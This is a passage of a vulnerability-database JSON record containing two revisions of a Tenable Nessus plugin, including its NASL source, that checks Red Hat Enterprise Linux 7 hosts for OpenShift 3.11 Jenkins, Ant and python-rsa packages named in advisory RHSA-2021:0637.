"published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1889972", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/862.html", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1895946", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1903702"], "cvelist": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "immutableFields": [], "lastseen": "2021-03-07T06:00:13", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-07T06:00:13", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["ASA-202005-15", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["REDHAT-RHSA-2021-0038.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2021-0034.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "type": "cve"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0037", "RHSA-2021:0282", "RHSA-2020:5634", "RHSA-2021:0637", "RHSA-2021:0719", "RHSA-2020:2618", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2021-03-07T06:00:13", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/05\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(200, 377, 385, 611, 862);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:3.11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:3.11::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0637');\n}\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/a:redhat:openshift:3.11", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/a:redhat:openshift:3.11::el7", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:python2-rsa", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-07T06:00:13", "differentElements": ["cpe", "sourceData"], "edition": 2}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "6292ef3f391a001df7a81706c203fea0ddf1a0e110e18114eeb99ff14b84845e", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1889972", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/862.html", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1895946", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1903702"], "cvelist": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "immutableFields": [], "lastseen": "2021-03-25T13:49:00", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-25T13:49:00", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["ASA-202005-15", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["REDHAT-RHSA-2021-0038.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2021-0034.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "type": "cve"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0037", "RHSA-2021:0282", "RHSA-2020:5634", "RHSA-2021:0637", "RHSA-2021:0719", "RHSA-2020:2618", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2021-03-25T13:49:00", "rev": 2, "value": 6.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/24\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(200, 377, 385, 611, 862);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:3.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0637');\n}\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n 